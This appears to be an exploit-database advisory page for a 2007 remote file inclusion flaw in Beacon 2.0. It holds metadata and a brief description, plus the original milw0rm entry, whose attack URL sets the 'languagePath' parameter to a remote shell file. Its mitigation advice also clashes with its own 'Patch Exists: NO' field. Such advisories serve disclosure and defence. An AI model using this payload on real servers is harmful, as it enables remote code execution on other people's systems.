header-logo
Suggest Exploit
vendor:
Beacon
by:
ThE TiGeR
7.5
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: Beacon
Affected Version From: Beacon 2.0
Affected Version To: Beacon 2.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Beacon => 2.0 Remote File Inclusion (languagePath)

This exploit allows an attacker to include remote files by manipulating the 'languagePath' parameter in the 'splash.lang.php' file of the Beacon 2.0 application.

Mitigation:

To mitigate this vulnerability, users should update to the latest version of Beacon, which is not affected by this exploit.
Source

Exploit-DB raw data:

#Beacon => 2.0Remot file inclusion (languagePath)                                           

#Download script : http://download.savannah.gnu.org/releases/beacon/beacon_0_2_0.zip            

#Thanks Str0ke

#Exploit:

#http://victime.com/pbeacon_path]/beacon/language/1/splash.lang.php?languagePath=shell.txt?

#Discovered by ThE TiGeR

#Miro_Tiger100[at]Hotmail[dot]com

# milw0rm.com [2007-05-12]
cqrsecured